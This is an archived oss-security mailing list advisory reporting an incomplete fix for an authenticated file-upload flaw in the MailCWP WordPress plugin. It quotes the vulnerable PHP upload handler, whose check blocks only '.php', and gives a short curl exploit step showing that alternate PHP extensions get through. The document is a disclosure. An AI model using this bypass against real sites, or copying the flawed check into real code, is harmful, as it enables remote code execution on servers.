Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 08 Nov 2016 05:40:55 -0500
From: "Larry W. Cashdollar" <>
To: Open Source Security <>
Subject: Mailcwp remote file upload vulnerability incomplete fix v1.100

Title: Mailcwp remote file upload vulnerability incomplete fix v1.100
Author: Larry W. Cashdollar, @_larry0
Date: 2016-11-01
Download Site:
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2016-11-01
Vendor Contact:
Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
I noticed CVE-2015-1000000 wasn't fixed correctly, _any_ authenticated user can upload a file to the WordPress installation, they can get .php code execution by changing the extension to .php[3-5], .pht or .phtml.

My previous advisory:

require_once "../../../wp-load.php";

if (!is_user_logged_in()) {
  die('{"ERROR": -1}');

$message_id = $_REQUEST["message_id"];
$upload_dir = $_REQUEST["upload_dir"];
if (empty($_FILES) || $_FILES["file"]["error"]) {
  die('{"OK": 0}');
$fileName = $_FILES["file"]["name"];
$ext = pathinfo($fileName, PATHINFO_EXTENSION);
if ($ext == 'php') {
  die('{"ERROR": -2}');
move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");
die('{"OK": 1}');

Exploit Code:
	• Create any type of user and copy the contents of your cookie file for curl:
	• $ curl   -F "" "" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt 
	• {"OK": 1}
Notes: Incomplete fix for CVE-2015-1000000

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ